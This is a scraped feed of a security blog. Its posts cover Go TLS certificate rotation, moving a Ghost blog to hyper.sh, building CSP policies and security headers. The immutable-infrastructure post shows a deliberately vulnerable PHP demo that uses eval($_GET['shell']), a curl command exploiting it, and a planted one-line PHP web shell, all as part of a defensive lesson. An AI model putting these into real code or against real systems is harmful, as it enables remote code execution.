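<pre><code class="language-golang">// Simplified sketch of the idea behind MutableTLSCreds.ServerHandshake;
// see the linked swarmkit implementation for the real thing.
func (c *MutableTLSCreds) ServerHandshake(rawConn net.Conn) (net.Conn, credentials.AuthInfo, error) {
	c.Lock()
	config := c.config // whatever config is active right now
	c.Unlock()

	conn := tls.Server(rawConn, config)
	if err := conn.Handshake(); err != nil {
		rawConn.Close()
		return nil, nil, err
	}
	return conn, credentials.TLSInfo{State: conn.ConnectionState()}, nil
}
</code></pre>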
<h3 id="changescomingingolang18">Changes coming in Golang 1.8</h3>
<p>If the previous method seems a bit clunky to you, it&apos;s because it is. Thankfully, <a href="https://blog.gopheracademy.com/advent-2016/go-1.8/?ref=blog.diogomonica.com">Golang 1.8</a> is bringing some changes that will help simplify this use-case. In particular, the addition of <a href="https://tip.golang.org/pkg/crypto/tls/?ref=blog.diogomonica.com#Config.GetConfigForClient">GetConfigForClient</a> will allow us to dynamically change the server&apos;s TLS Config behavior based on the <code>ClientHello</code> message.</p>
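<p>As a sketch of what that could look like (reusing the <code>wrapped</code> config holder from above), the per-connection wrapping collapses back into a plain <code>tls.Listen</code>:</p>
<pre><code class="language-golang">config := &amp;tls.Config{
	// Called once per ClientHello; returning the currently active config
	// gives us rotation without wrapping every accepted connection.
	GetConfigForClient: func(hello *tls.ClientHelloInfo) (*tls.Config, error) {
		return wrapped.getConfig(), nil
	},
}
listener, _ := tls.Listen(&quot;tcp&quot;, &quot;0.0.0.0:8080&quot;, config)
</code></pre>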
<p>Additionally, Golang 1.8 is also adding support for ChaCha20-Poly1305 based cipher suites and the <code>VerifyPeerCertificate</code> method, which enables custom certificate checking logic.</p>
<h3 id="conclusion">Conclusion</h3>
<p>The ability to do hitless TLS certificate rotation is critical to continuing our quest of reducing certificate expiration times while keeping our sanity intact.</p>
<p>Hopefully, at this point you&apos;ll agree with me that Golang makes it incredibly easy to support hitless TLS certificate rotation in your applications, so go forth and <em>rotate all the keys</em>.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>The default expiration time is three months, but can be brought all the way down to one hour. <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn2" class="footnote-item"><p>Assuming that we wait for all the connections from old instances to terminate. <a href="#fnref2" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn3" class="footnote-item"><p>I chose to use a Mutex for readability. Technically, we could have made the code shorter by using atomic.LoadPointer() instead. <a href="#fnref3" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Build once run where? Migrating my blog to hyper.sh]]></title><description><![CDATA[Docker's motto is build once, run everywhere. I put that to the test by migrating my containerized blog to a new Docker hosting platform called Hyper.sh.]]></description><link>https://blog.diogomonica.com/2016/12/03/build-once-run-where-migrating-my-blog-to-hyper-sh/</link><guid isPermaLink="false">62d8ce7b47f91800018f06dc</guid><category><![CDATA[docker]]></category><category><![CDATA[hypersh]]></category><category><![CDATA[ghost]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sat, 03 Dec 2016 17:59:49 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>A few months ago, I ran into a cool new product called <a href="https://console.hyper.sh/register/invite/Rnw0bmKER7TqrxE2owaGuWNk5Jjp4zU8?ref=blog.diogomonica.com">hyper.sh</a>, a Docker container hosting platform. The goal of hyper.sh is to make it easier to deploy your containerized applications to the cloud by replicating the Docker command-line experience.</p>
<p><a href="https://console.hyper.sh/register/invite/Rnw0bmKER7TqrxE2owaGuWNk5Jjp4zU8?ref=blog.diogomonica.com"><img src="https://blog.diogomonica.com/content/images/2016/12/Screenshot-2016-12-02-17.09.22.png" alt="http://hyper.sh" loading="lazy"></a></p>
<p>Since I&apos;m already running this blog inside of a container and the promise of Docker is to build once, run everywhere, I wanted to see how easy and how much cheaper it would be to migrate from a $5 <a href="https://m.do.co/c/7e737c9c7d00?ref=blog.diogomonica.com">Digital Ocean</a> instance to hyper.sh.</p>
<h2 id="currentsetup">Current Setup</h2>
<p>I&apos;m running my Ghost blog on a Ubuntu 16.04 $5 <a href="https://m.do.co/c/7e737c9c7d00?ref=blog.diogomonica.com">Digital Ocean</a>  droplet.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/12/Screenshot-2016-12-02-17.26.59-1.png" alt loading="lazy"></p>
<p>I use a local directory (<code>/var/www/ghost</code>) to keep my persistent data, and use the <a href="https://hub.docker.com/_/ghost/?ref=blog.diogomonica.com">official ghost</a> image directly, passing in <code>NODE_ENV=production</code> and forwarding port <code>80</code> to the internal port <code>2368</code>.</p>
<pre><code class="language-terminal">&#x279C;  ~ docker run -d --name ghost-blog -v /var/www/ghost:/var/lib/ghost \
--restart always -e &quot;NODE_ENV=production&quot; \
-p 80:2368 ghost
</code></pre>
<h2 id="migratingtohypersh">Migrating to Hyper.sh</h2>
<p>The migration to hyper.sh was surprisingly straightforward.</p>
<ul>
<li><a href="https://console.hyper.sh/register/invite/Rnw0bmKER7TqrxE2owaGuWNk5Jjp4zU8?ref=blog.diogomonica.com">Create an account</a>.</li>
<li><a href="https://docs.hyper.sh/GettingStarted/generate_api_credential.html?ref=blog.diogomonica.com">Generate credentials</a> on the web UI.</li>
<li>Install <code>hyper</code> by doing <code>brew install hyper</code>.</li>
<li>Configure <code>hyper</code> by running the <code>hyper config</code> command and providing the API credentials.</li>
</ul>
<p>At this point we have a working hyper.sh installation, and we&apos;re ready to run any container.</p>
<pre><code class="language-terminal">&#x279C;  hyper run -it alpine sh
Unable to find image &apos;alpine:latest&apos; in the current region
latest: Pulling from library/alpine

3690ec4760f9: Pull complete
Digest: sha256:1354db23ff5478120c980eca1611a51c9f2b88b61f24283ee8200bf9a54f2e5c
Status: Downloaded newer image for alpine:latest

/ #
</code></pre>
<p>The next step was to migrate my current Ghost data. This turned out to also be surprisingly easy since hyper.sh supports <a href="https://docs.hyper.sh/Feature/storage/volume.html?ref=blog.diogomonica.com">uploading local files</a> when creating a new volume on run.</p>
<p>When running a container with a volume that points to a local path, hyper.sh will automatically upload the data and create a new (10GB) volume for us. So all I had to do was download the current Ghost blog directory from my DO instance to my laptop, and do <code>hyper run</code>:</p>
<pre><code class="language-terminal">&#x279C; scp -r ghost@ghost:/var/www/ghost/ ghost
&#x279C; hyper run -v ./ghost_data:/var/lib/ghost alpine sh
Sending ghost_data 312 / 312 [=========================] 100.00% 27s
&#x279C; hyper volume ls
DRIVER              VOLUME NAME                                                       SIZE                CONTAINER
hyper               794b1...a0f184   10 GB               66d5943a5ab1
</code></pre>
<p>With the data uploaded to the remote volume, we just have to run the Ghost blog with the same arguments we were using to run it before (inside of the DO droplet), except for <code>-v</code> that now needs the volume ID instead of the path to the data:</p>
<pre><code class="language-terminal">&#x279C; hyper run -d --name ghost-blog -v 794b1...a0f184:/var/lib/ghost \ 
--restart always -e &quot;NODE_ENV=production&quot; -p 80:2368 ghost
&#x279C; hyper logs -f ghost-blog

Ghost is running in production...
Your blog is now available on http://diogomonica.com
Ctrl+C to shut down
</code></pre>
<p>The final step we have to take is to get ourselves a publicly routable IP address, and attach it to our <code>ghost-blog</code> container. We can do that easily by running the <code>hyper fip allocate</code> and <code>hyper fip attach</code> commands:</p>
<pre><code class="language-terminal">&#x279C; hyper hyper fip allocate 1
209.177.92.130
&#x279C; hyper fip attach 209.177.92.130 ghost-blog
&#x279C;  ~ curl 209.177.92.130
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
...
</code></pre>
<h2 id="monthlycost">Monthly cost</h2>
<p>The pricing of hyper.sh is more complicated than the simple $5 a month for Digital Ocean. Here is a link to the <a href="https://hyper.sh/pricing.html?ref=blog.diogomonica.com">pricing page</a>.</p>
<p>They charge $5.18 for the default S4 container size (512MB of RAM), $1 for the public IP address, and $0.10 for the first GB of image storage, bringing the TCO to $6.28.</p>
<blockquote>
<p>What?</p>
</blockquote>
<p>Yup. Turns out using the default container size for the blog would actually be more expensive than using the smallest Digital Ocean droplet. Fortunately hyper.sh has smaller sizes to offer:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/12/Screenshot-2016-12-02-18.22.09.png" alt loading="lazy"></p>
<p>You can change the container size by using the <code>--size=SIZE</code> option when doing <code>hyper run</code>. I wasn&apos;t able to make the S1 or S2 sizes work due to memory constraints. The S3 size, however, worked great, bringing the total cost of running my blog down from $5 to $3.69. A whole dollar and 31 cents of savings per month!!</p>
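<p>Concretely, rerunning the blog at the smaller size is just the earlier command with the size flag added (assuming the CLI takes the lowercase size name):</p>
<pre><code class="language-terminal">&#x279C; hyper run -d --name ghost-blog --size=s3 -v 794b1...a0f184:/var/lib/ghost \
--restart always -e &quot;NODE_ENV=production&quot; -p 80:2368 ghost
</code></pre>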
<h2 id="conclusion">Conclusion</h2>
<p>I was really impressed by how easy and seamless it was to migrate from DO to hyper.sh. I was expecting more than $1.31 of savings, but the fact that I no longer have to manage/update the underlying OS is the major advantage that hyper.sh is providing its users.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Increasing Attacker Cost Using Immutable Infrastructure]]></title><description><![CDATA[Applications will never be perfect, but immutable infrastructure helps with incident response, allows fast-recovery, and makes the attacker’s jobs harder. 
]]></description><link>https://blog.diogomonica.com/2016/11/19/increasing-attacker-cost-using-immutable-infrastructure/</link><guid isPermaLink="false">62d8ce7b47f91800018f06da</guid><category><![CDATA[docker]]></category><category><![CDATA[immutable]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Sat, 19 Nov 2016 23:47:51 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>One neat thing about Docker containers is the fact that they are immutable. Docker ships with a copy-on-write filesystem, meaning that the base image cannot be modified, unless you explicitly issue a commit.</p>
<p>One of the reasons why this is so useful is that you can check for drift really easily, which might come in handy if you are trying to investigate a security incident.</p>
<h3 id="demoapplication">Demo application</h3>
<p>Take the following demo infrastructure as an example:</p>
<img src="https://blog.diogomonica.com/content/images/2016/09/Security-@Scale-diagrams.png" width="500px" height="200px">
<p>We have a <a href="https://github.com/diogomonica/apachehackdemo?ref=blog.diogomonica.com">PHP application</a> running on our Front-end, and a MySQL server acting as our backend database. You can follow along at home by running:</p>
<pre><code class="language-console">&#x279C; docker run -d --name db -e MYSQL_ROOT_PASSWORD=insecurepwd mariadb
&#x279C; docker run -d -p 80:80 --link db:db diogomonica/phphack
</code></pre>
<p>Now that you have your database and front-end running you should be greeted by something that looks like this:</p>
<img src="https://blog.diogomonica.com/content/images/2016/09/Screenshot-2015-06-03-17-31-26-1.png" width="500px" height="200px">
<p>Unfortunately, and not unlike every single other PHP application out there, this application has a remote code execution vulnerability:</p>
<pre><code class="language-php">if($links) {
&lt;h3&gt;Links found&lt;/h3&gt;
... 
eval($_GET[&apos;shell&apos;]);
?&gt;
</code></pre>
<p>It looks like someone is using <code>eval</code> where they shouldn&apos;t! Any attacker can exploit this vulnerability, and execute arbitrary commands on the remote host:</p>
<pre><code class="language-bash">&#x279C; curl -s http://localhost/\?shell\=system\(&quot;id&quot;\)\; | grep &quot;uid=&quot;
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre>
<p>The first action of any attacker on a recently compromised host is to make herself at home by downloading PHP shells and toolkits. Some attackers might even be inclined to redesign your website:</p>
<img src="https://blog.diogomonica.com/content/images/2016/09/Screenshot-2016-09-03-20-36-55.png" width="500px" height="200px">
<h3 id="recoveringfromthehack">Recovering from the hack</h3>
<p>Going back to immutability, one of the cool things that a copy-on-write filesystem provides is the ability to see all the changes that took place. By using the <code>docker diff</code> command, we can actually see what the attacker was up to in terms of file modifications:</p>
<pre><code class="language-bash">&#x279C; docker diff pensive_meitner
C /run
C /run/apache2
A /run/apache2/apache2.pid
C /run/lock
C /run/lock/apache2
C /var
C /var/www
C /var/www/html
C /var/www/html/index.html
A /var/www/html/shell.php
</code></pre>
<p>Interesting. It seems like the attacker not only modified our <code>index.html</code>, but also downloaded a php-shell, conveniently named <code>shell.php</code>. But our focus should be on getting the website back online.</p>
<p>We can store this image for later reference by doing a <code>docker commit</code>, and since containers are immutable (&#x1F389;), we can restart our container and we&#x2019;re back in business:</p>
<pre><code class="language-console">&#x279C; docker commit pensive_meitner
sha256:ebc3cb7c3a312696e3fd492d0c384fe18550ef99af5244f0fa6d692b09fd0af3
&#x279C; docker kill pensive_meitner
&#x279C; docker run -d -p 80:80 --link db:db diogomonica/phphack
</code></pre>
<img src="https://blog.diogomonica.com/content/images/2016/09/backinbiz.png" width="300px" height="200px">
<p>We can now go back to the saved image and look at what the attacker modified:</p>
<pre><code class="language-console">&#x279C; docker run -it ebc3cb7c3a312696e3fd492d0c384fe18550ef99af5244f0fa6d692b09fd0af3 sh
# cat index.html
&lt;blink&gt;HACKED BY SUPER ELITE GROUP OF HACKERS&lt;/blink&gt;
# cat shell.php
&lt;?php
eval($_GET[&apos;cmd&apos;]);
?&gt;
</code></pre>
<p>It looks like we just got hacked by the famous SUPER ELITE GROUP OF HACKERS. &#xAF;\_(&#x30C4;)_/&#xAF;</p>
<h3 id="increasingtheattackercost">Increasing the attacker cost</h3>
<p>Being able to see the changes in the container after an attack is certainly useful, but what if we could have avoided the attack in the first place? This is where <code>--read-only</code> comes in.</p>
<p>The <code>--read-only</code> flag instructs Docker to not allow any writes to the container&#x2019;s filesystem. This would have prevented the modification of <code>index.html</code>, but more importantly, it would not have allowed the attacker to download the PHP shell, or any of the other tools attackers like to use.</p>
<p>Let&#x2019;s try it out and see what happens:</p>
<pre><code class="language-console">&#x279C; docker run -p 80:80 --link db:db -v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ --sig-proxy=false --read-only diogomonica/phphack
...
172.17.0.1 - - [04/Sep/2016:03:59:06 +0000] &quot;GET / HTTP/1.1&quot; 200 219518 &quot;-&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48&quot;
sh: 1: cannot create index.html: Read-only file system
</code></pre>
<p>Given that our filesystem is now read-only, it seems that the attacker&#x2019;s attempt to modify our <code>index.html</code> was foiled. &#x1F60E;</p>
<h3 id="isthisbulletproof">Is this bullet-proof?</h3>
<p>No, absolutely not. Until we fix this RCE vulnerability, the attacker will still be able to execute code on our host, steal our credentials, and exfiltrate the data in our database.</p>
<p>This said, together with running a <a href="https://hub.docker.com/_/alpine/?ref=blog.diogomonica.com">minimal image</a>, and some other really cool <a href="https://www.delve-labs.com/articles/docker-security-production-2/?ref=blog.diogomonica.com">Docker security features</a>, you can make it <em>a lot</em> harder for any attacker to maintain persistence and continue poking around your network.</p>
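<p>As an illustrative (and definitely not exhaustive) example of those knobs, here is what a more locked-down run of our demo app might look like; these are standard <code>docker run</code> flags, but the exact capability set your image needs will vary:</p>
<pre><code class="language-console">&#x279C; docker run -d -p 80:80 --link db:db --read-only \
-v /tmp/apache2:/var/run/apache2/ -v /tmp/apache:/var/lock/apache2/ \
--cap-drop ALL --cap-add NET_BIND_SERVICE --cap-add SETUID --cap-add SETGID \
--security-opt no-new-privileges --pids-limit 100 \
diogomonica/phphack
</code></pre>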
<h3 id="conclusion">Conclusion</h3>
<p>The security of our applications will never be perfect, but having immutable infrastructure helps with incident response, allows fast-recovery, and makes the attacker&#x2019;s jobs harder.</p>
<p>If by using a strong sandbox and tuning a few knobs you can make your application safer, why wouldn&#x2019;t you? &#x1F433;</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Creating a CSP Policy from Scratch]]></title><description><![CDATA[In this post I go over how to create a least-privilege CSP policy from scratch.]]></description><link>https://blog.diogomonica.com/2015/12/30/creating-a-csp-policy-from-scratch/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c7</guid><category><![CDATA[csp]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Wed, 30 Dec 2015 20:54:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>When I added the Content-Security-Policy (CSP) security header to my website, I was more concerned about <a href="https://blog.diogomonica.com/2015/12/29/from-double-f-to-double-a/">getting a good rating</a> on <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a>, than actually creating a good policy. In this post I&apos;ll show you how I created a new, better, CSP policy from scratch.</p>
<p>I&apos;m going to assume some familiarity with the fundamentals of CSP. For a good introduction on CSP and the motivations behind it, read <a href="http://www.html5rocks.com/en/tutorials/security/content-security-policy/?ref=blog.diogomonica.com">this article</a>.</p>
<h2 id="startingapolicyfromscratch">Starting a policy from scratch</h2>
<p>CSP follows a whitelist model. If you include the header but don&apos;t include a specific directive, that is equivalent to specifying * as the valid source for that directive (i.e. everywhere). On the other hand, if you do include a directive, only the sources listed will be allowed.</p>
<p>There are a lot of directives that can be used to enforce policies for content types. You can see an exhaustive list of directives <a href="https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives?ref=blog.diogomonica.com">here</a>. CSP also allows policies around particular circumstances, such as whether the browser should include referer headers when following links away from a page.</p>
<p>A good start for any CSP policy is the directive <em>default-src &apos;none&apos;</em>. This directive does what you&apos;d expect it to do: if a directive isn&apos;t explicitly set, it will default to this value.</p>
<pre><code class="language-bash">Content-Security-Policy: default-src &apos;none&apos;
</code></pre>
<p>Unfortunately, the directives in the following list don&apos;t use <em>default-src</em> as a fallback, which means that we will have to remember to set them explicitly, or they will default to allowing everything.</p>
<ul>
<li>frame-ancestors</li>
<li>report-uri</li>
<li>base-uri</li>
<li>form-action</li>
<li>sandbox</li>
</ul>
<h2 id="addingsomesanedefaults">Adding some sane defaults</h2>
<p>First, we will start by allowing the current origin (<em>self</em>) to load most resource types. Second, we&apos;re going to instruct the browser to block <a href="https://developer.mozilla.org/en-US/docs/Security/MixedContent/How_to_fix_website_with_mixed_content?ref=blog.diogomonica.com">mixed content</a>, explicitly enable <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)?ref=blog.diogomonica.com">reflected XSS</a> protections, ensure we&apos;re not sending referrer headers when downgrading from HTTPS to HTTP (to avoid <a href="https://blog.mozilla.org/security/2015/01/21/meta-referrer/?ref=blog.diogomonica.com">referrer leaks</a>), and access every HTTP URL via HTTPS instead<sup><a id="ffn1" href="#fn1" class="footnote">1</a></sup>.</p>
<pre><code class="language-http">Content-Security-Policy: 
	default-src &apos;none&apos;; 
	script-src &apos;self&apos;; style-src &apos;self&apos;; 
	img-src &apos;self&apos;; font-src &apos;self&apos;; 
	upgrade-insecure-requests; block-all-mixed-content; 
	reflected-xss block; referrer no-referrer-when-downgrade;
</code></pre>
<p>Note that, by leaving <em>connect-src</em>, <em>media-src</em>, <em>object-src</em>, and <em>child-src</em> out of this policy, we&apos;re effectively disallowing XMLHttpRequest, WebSockets, audio, video, Flash, and iframes from being used with this website. Change it accordingly.</p>
<p>Even though generating CSP policies manually is incredibly instructive, it is also very typo prone. Feel free to use a <a href="https://report-uri.io/home/generate/?ref=blog.diogomonica.com">CSP headers generator</a> to generate your base policy instead.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/policy_generator.png" alt loading="lazy"></p>
<h2 id="testingthebasepolicy">Testing the base policy</h2>
<p>At this point we have a strong initial policy that will not allow loading anything external to your own domain. Instead of deploying it in enforce mode, which would most likely break your website, we can swap out <em>Content-Security-Policy</em> for <em>Content-Security-Policy-Report-Only</em>, and get a comprehensive list of everything that doesn&apos;t follow this base policy. This is a good way of finding the minimum set of necessary resources that we need to allow to enable enforce mode.</p>
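<p>In other words, we ship the exact same base policy under the report-only header name:</p>
<pre><code class="language-http">Content-Security-Policy-Report-Only: 
	default-src &apos;none&apos;; 
	script-src &apos;self&apos;; style-src &apos;self&apos;; 
	img-src &apos;self&apos;; font-src &apos;self&apos;; 
	upgrade-insecure-requests; block-all-mixed-content; 
	reflected-xss block; referrer no-referrer-when-downgrade;
</code></pre>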
<p><img src="https://blog.diogomonica.com/content/images/2016/08/chrome_developer_console.png" alt loading="lazy"></p>
<p>Some common exceptions you may have to add are going to be external resources, such as javascript, images and fonts. For example, in order to allow the embedding of slideshare decks (see image above), I added the following directive:</p>
<pre><code class="language-http">frame-src &apos;self&apos; https://www.slideshare.net;
</code></pre>
<p>To allow loading google fonts and google analytics, I added:</p>
<pre><code class="language-http">script-src &apos;self&apos; https://www.google-analytics.com/;
img-src &apos;self&apos; https://www.google-analytics.com; 
style-src &apos;self&apos; https://fonts.googleapis.com; 
font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com;
</code></pre>
<p>Note the change to the <em>img-src</em> directive. Google Analytics uses a tracking pixel, which is technically an image.</p>
<h3 id="inlinecode">Inline Code</h3>
<p>One of the reasons why CSP is such a big deal for web security is the fact that it can largely eliminate XSS attacks. It does so by not allowing inline <em>script</em> tags and <em>javascript://</em> URLs. Unfortunately, developers use a lot of inline code. This is actually one of the most common roadblocks to creating a good CSP policy.</p>
<p>There is a directive value that was created specifically to work around this issue: <em>unsafe-inline</em>, but you should never use it. Instead, you should <a href="http://stackoverflow.com/questions/21593051/converting-inline-javascript-to-external?ref=blog.diogomonica.com">turn your inline javascript into an externally loaded script</a>.</p>
<h2 id="reportingpolicyviolations">Reporting Policy Violations</h2>
<p>One of the coolest directives of CSP is <em>report-uri</em>, which specifies the URL to which browsers should report violations of the Content Security Policy. You can deploy your own application to receive these reports, or use a free online version, like <a href="https://report-uri.io/?ref=blog.diogomonica.com">report-uri.io</a>.</p>
<p>In my case, I signed up for <a href="https://report-uri.io/?ref=blog.diogomonica.com">report-uri.io</a>, configured my domain to be <em>diogomonica.com</em>, and added the following line to my policy:</p>
<pre><code class="language-http">report-uri https://report-uri.io/report/59e303e8e117668e8e166508913a6d1d;
</code></pre>
<p>This is my own unique URL, to which browsers will send JSON reports about any violations on diogomonica.com. This is what a violation would look like:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/report.png" alt loading="lazy"></p>
<p>And the corresponding JSON:</p>
<pre><code class="language-json">{
    &quot;csp-report&quot;: {
        &quot;document-uri&quot;: &quot;https://diogomonica.com/2015/12/29/from-double-f-to-double-a/&quot;,
        &quot;referrer&quot;: &quot;&quot;,
        &quot;violated-directive&quot;: &quot;img-src &apos;self&apos; https://www.google-analytics.com&quot;,
        &quot;effective-directive&quot;: &quot;img-src&quot;,
        &quot;original-policy&quot;: &quot;default-src &apos;none&apos;; script-src &apos;self&apos; https://www.google-analytics.com/; img-src &apos;self&apos; https://www.google-analytics.com; style-src &apos;self&apos; &apos;unsafe-inline&apos; https://fonts.googleapis.com; font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com; frame-src &apos;self&apos; https://www.slideshare.net; upgrade-insecure-requests; block-all-mixed-content; reflected-xss block; referrer no-referrer-when-downgrade; frame-ancestors &apos;none&apos;; base-uri diogomonica.com www.diogomonica.com; form-action &apos;none&apos;; report-uri https://report-uri.io/report/59e303e8e117668e8e166508913a6d1d;&quot;,
        &quot;blocked-uri&quot;: &quot;data&quot;,
        &quot;status-code&quot;: 0
    }
}
</code></pre>
<h2 id="addingthefinaldirectives">Adding the final directives</h2>
<p>Remember the earlier directives that don&apos;t inherit the default behavior? Well, we should explicitly set those to some reasonable values.</p>
<ul>
<li><em>frame-ancestors</em> specifies valid parents that may embed a page using <em>frame</em> and <em>iframe</em> elements.</li>
<li><em>base-uri</em> defines the URIs that a user agent may use as the document base URL.</li>
<li><em>form-action</em> specifies valid endpoints for <em>form</em> submissions.</li>
<li><em>sandbox</em> <a href="https://html.spec.whatwg.org/multipage/browsers.html?ref=blog.diogomonica.com#sandboxing">places restrictions on actions the page can take</a>, instead of restricting resources it can load. It will be the topic of a future blog post.</li>
</ul>
<p>This is my final policy:</p>
<pre><code class="language-http">Content-Security-Policy 
	&quot;default-src &apos;none&apos;; 
	script-src &apos;self&apos; https://www.google-analytics.com/; 
	img-src &apos;self&apos; https://www.google-analytics.com; 
	style-src &apos;self&apos; https://fonts.googleapis.com; 
	font-src &apos;self&apos; https://fonts.googleapis.com https://fonts.gstatic.com; 
	frame-src &apos;self&apos; https://www.slideshare.net; 
	upgrade-insecure-requests; block-all-mixed-content; 
	reflected-xss block; referrer no-referrer-when-downgrade; 
	frame-ancestors &apos;none&apos;; form-action &apos;none&apos;; 
	base-uri diogomonica.com www.diogomonica.com;
	report-uri https://report-uri.io/report/59e303e8e117668e8e166508913a6d1d;&quot;
</code></pre>
<p>At this point we can use the <a href="https://report-uri.io/home/analyse?ref=blog.diogomonica.com">online CSP analyzer</a>, to make sure we&apos;re green across the board.</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/green_across.png" alt loading="lazy"></p>
<h2 id="dealingwithlargecspheaders">Dealing with large CSP headers</h2>
<p>Unfortunately, HTTP headers aren&apos;t compressed<sup><a id="ffn2" href="#fn2" class="footnote">2</a></sup>, which means that you will be injecting a potentially large CSP header into every HTTP response.</p>
<p>To avoid that, you can set some or all of your policies directly in the page markup. You do that by using the meta tag with an http-equiv attribute:</p>
<pre><code class="language-html">&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &apos;none&apos;; script-src &apos;self&apos; https://www.google-analytics.com/;&quot;&gt; 
</code></pre>
<p>There are three directives that can&#x2019;t be set using meta tags: <em>frame-ancestors</em>, <em>report-uri</em>, and <em>sandbox</em>.</p>
<p>Another possible work-around is to take advantage of the conditional header injection features of your web server. If you&apos;re using nginx, you can create a map that will return different headers, based on the content-type of the page.</p>
<pre><code class="language-http">map $sent_http_content_type $csp_policies {
    &quot;text/html&quot;    &quot;default-src &apos;none&apos;; script-src &apos;self&apos; https://www.google-analytics.com/; ...&quot;;
    default       &quot;default-src &apos;none&apos;&quot;;
}

server {
    location / {
        add_header &quot;Content-Security-Policy&quot; $csp_policies;
    }
}
</code></pre>
<h2 id="conclusion">Conclusion</h2>
<p>By designing your CSP policies from scratch, you can achieve a least-privilege CSP deployment, and create a policy that allows exactly what you need. No more, no less.</p>
<p>If you start by enabling CSP in <em>Report-Only</em> mode, you can start knocking off all the necessary exceptions, with the help of the Chrome Developer Console, and easily change it to enforce mode later on.</p>
<p>If you care about the security of your users, you should care about CSP.</p>
<ol id="footnotes">
  <li id="fn1">The upgrade-insecure-requests and referrer policies are still a &quot;Working draft&quot;. <a href="#ffn1">&#x21A9;</a></li>
  <li id="fn2">This might not be as big of a problem in the future, since both HTTP2 and SPDY support header compression. <a href="#ffn2">&#x21A9;</a></li>
</ol>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[From F to A+: Getting Good Grades on Website Security Evaluations]]></title><description><![CDATA[Even though www.diogomonica.com is a statically generated HTML blog, I took the time to go from an F on securityheaders.io to an A+.]]></description><link>https://blog.diogomonica.com/2015/12/29/from-double-f-to-double-a/</link><guid isPermaLink="false">62d8ce7b47f91800018f06c5</guid><category><![CDATA[csp]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Tue, 29 Dec 2015 15:18:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Even though diogomonica.com is a statically generated blog, created using <a href="https://jekyllrb.com/?ref=blog.diogomonica.com">Jekyll</a>, it&apos;s always fun to run it through security evaluation websites such as <a href="https://www.ssllabs.com/ssltest/?ref=blog.diogomonica.com">SSL Labs</a> and <a href="https://securityheaders.io/?ref=blog.diogomonica.com">Security Headers</a>.</p>
<p>Unfortunately, last week, when I ran it through <a href="https://securityheaders.io/?ref=blog.diogomonica.com">securityheaders.io</a>&apos;s checker, I got the following result:</p>
<p><img src="https://blog.diogomonica.com/content/images/2016/08/f_rating_on_security_headers.png" alt loading="lazy"></p>
<p>This is obviously embarrassing for someone who works in security, and even though my blog has no need for advanced security headers, I decided to change that rating to an A+.</p>
<h2 id="whataretheseheaders">What are these headers?</h2>
<p>Before we turn those red warning boxes into a more pleasant light green, let me give you a high-level overview of what these headers are, and why you should make sure to include them in your web properties.</p>
<ul>
<li><strong>Content-Security-Policy (CSP)</strong>: allows the website to define a policy concerning which domains external javascripts, css, images, etc, can be imported and rendered from. Prevents XSS and other cross-site injections.</li>
<li><strong>X-Content-Type-Options</strong>: prevents IE and Google Chrome from MIME-sniffing a response away from the declared content-type.</li>
<li><strong>X-Frame-Options</strong>: protects against clickjacking attacks.</li>
<li><strong>X-XSS-Protection</strong>: essentially useless; it comes enabled by default in modern browsers.</li>
<li><strong>Strict-Transport-Security (HSTS)</strong>: tells your browser to always connect to a particular domain over HTTPS. Attackers aren&apos;t able to downgrade connections, and users can&apos;t ignore TLS warnings.</li>
<li><strong>Public-Key-Pins (HPKP)</strong>: tells your browser to associate a specific public key fingerprint with a particular domain. Prevents against an attacker getting a valid certificate from one of the hundreds of other Certificate Authorities out there.</li>
</ul>
<h2 id="fixingtheeasyones">Fixing the easy ones</h2>
<p>This is a lot less fun to do in a production setting, since changes like this have a tendency to break obscure corners of your application, but these headers are trivial to setup and will probably have minimal impact on your website.</p>
<p>Since I&apos;m running nginx as my webserver, I&apos;ll have to add <em>add_header</em> directives to my configuration file:</p>
<pre><code class="language-bash">add_header X-Frame-Options &quot;SAMEORIGIN&quot;;
add_header X-Content-Type-Options nosniff;
add_header X-XSS-Protection &quot;1; mode=block&quot;;
</code></pre>
<p>There isn&apos;t a lot to consider when choosing the arguments for these three headers, but if you want more information about them, make sure you consult the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers?ref=blog.diogomonica.com">Mozilla Headers page</a>.</p>
